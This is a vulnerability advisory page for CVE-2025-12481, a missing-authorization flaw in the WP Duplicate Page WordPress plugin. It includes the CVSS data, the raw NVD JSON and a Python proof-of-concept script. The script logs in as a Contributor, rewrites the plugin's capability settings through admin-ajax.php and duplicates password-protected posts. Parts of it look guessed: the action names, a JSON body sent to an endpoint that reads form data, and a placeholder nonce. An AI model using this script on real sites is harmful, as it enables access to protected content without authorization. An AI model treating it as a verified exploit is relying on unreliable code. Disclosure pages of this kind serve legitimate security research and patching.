Security Vulnerability Report
中文
CVE-2025-12481 CVSS 4.3 MEDIUM

CVE-2025-12481

Published: 2025-11-18 10:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Duplicate Page <= 1.7(所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12481 PoC - WP Duplicate Page Authorization Bypass # This PoC demonstrates how an authenticated user with Contributor role can modify plugin settings import requests import sys TARGET_URL = "https://vulnerable-wordpress-site.com" USERNAME = "attacker" PASSWORD = "attacker_password" def get_auth_cookie(): """Login to WordPress and get authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_authorization_bypass(cookies): """Modify plugin settings to gain elevated privileges""" settings_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Craft malicious request to saveSettings function payload = { 'action': 'wdp_save_settings', 'settings': { 'capabilities': { 'administrator': True, 'editor': True, 'author': True, 'contributor': True, # Grant contributor duplicate permission 'subscriber': True } } } headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } response = requests.post(settings_url, json=payload, cookies=cookies, headers=headers) print(f"Settings modification response: {response.status_code}") print(response.text) return response.status_code == 200 def duplicate_protected_post(cookies, post_id): """Duplicate a password-protected post using elevated privileges""" duplicate_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { 'action': 'wdp_duplicate_post', 'post_id': post_id, '_ajax_nonce': 'attacker_nonce' # May need valid nonce from page source } response = requests.post(duplicate_url, data=payload, cookies=cookies) print(f"Duplicate request response: {response.status_code}") return response.json() if __name__ == "__main__": print("[*] CVE-2025-12481 WP Duplicate Page Authorization Bypass PoC") print("[*] Target: WP Duplicate Page <= 1.7") # Step 1: Login as low-privileged user print("\n[1] Logging in as Contributor user...") cookies = get_auth_cookie() # Step 2: Exploit authorization bypass print("\n[2] Exploiting authorization bypass to modify settings...") if exploit_authorization_bypass(cookies): print("[+] Settings modified successfully!") # Step 3: Duplicate protected content print("\n[3] Attempting to duplicate password-protected posts...") protected_post_id = 123 # Replace with actual post ID result = duplicate_protected_post(cookies, protected_post_id) print(f"[+] Result: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12481", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Duplicate Page plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'saveSettings' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings that control role capabilities, and subsequently exploit the misconfigured capabilities to duplicate and view password-protected posts containing sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Classes/ButtonDuplicate.php#L137", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.6/includes/Page/Settings.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394773%40wp-duplicate-page%2Ftrunk&old=3386144%40wp-duplicate-page%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/61105f6a-1bd7-415d-9481-a1c2c310f778?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.